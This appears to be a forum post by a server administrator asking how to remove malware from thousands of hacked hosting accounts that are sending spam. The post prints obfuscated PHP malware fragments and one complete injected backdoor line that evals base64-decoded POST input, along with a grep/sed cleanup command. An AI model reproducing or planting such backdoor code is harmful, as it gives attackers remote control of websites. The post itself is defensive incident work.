I have multiple VPS with at least thousands of accounts in them.
My clients' websites are hacked and sending spam emails. I checked the log and found out two types of scritps
type1:
<?php
$d79="HYI\riP=s5`bX'a43Z #fn%dTy9c|JWjMV<z0Q]6&kD}UECrue~mq8->N2hpx_!Bo*g\nK\$O1{7G[^.L+Rw\\;?FA)lt\tS@,/\":(v"; $GLOBALS['ujijy64'] = $d79[4].$d7
type2:
<?php
function wtakziboyl($gaezs, $fp){$vdxhvfmnol = ''; for($i=0; $i < strlen($gaezs); $i++){$vdxhvfmnol .= isset($fp[$gaezs[$i]]) ? $fp[$gaezs[$i]] : $gaezs[$i];}
$otcow="base64_decode";return $otcow($vdxhvfmnol);}
$sfnb = '4fwFMBxy214Q5XBm8exm1XHK2m83NZsBdZpzvpzUMRsz1jCwgJArtfxr1X'.
'Bm8exm8m83NSUzvpzUMRsz1jCwgJArtRhY1XBY2RCIgfwKtwxkMRIw5mpAbJ'.
'aiJa0y21cqgfwE2Bx3MRIzgJApOd3OJeweOfwy8XBkOJcqnkBPBaBPOPaOopQ55hxdcB'.
After further investigating I found out injected scripts at the top of Genuine files like below
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n828e00'])) {eval($s21(${$s20}['n828e00']));}?>
This above code I suspect as backdoor. I want to remove all those scripts or atleast stop them from executing it. May be I can use modsec rules.
By surfing internet I found out we can run below code to remove such injection
grep -Rl PCT4BA6ODSE . | xargs sed -i 's/<[?]php.*PCT4BA6ODSE_.*[?]>/<\?php \/\/ RECOVERED FILE \?>/g'
Manually finding such files in server where thousands of account are hosted is something like impossible. So i want it to do automatically (in this case)
I know there are many other backdoors but for this scenario what you people suggest?
This may not be the good idea and it may affect server performance, I would love to hear any alternative ideas.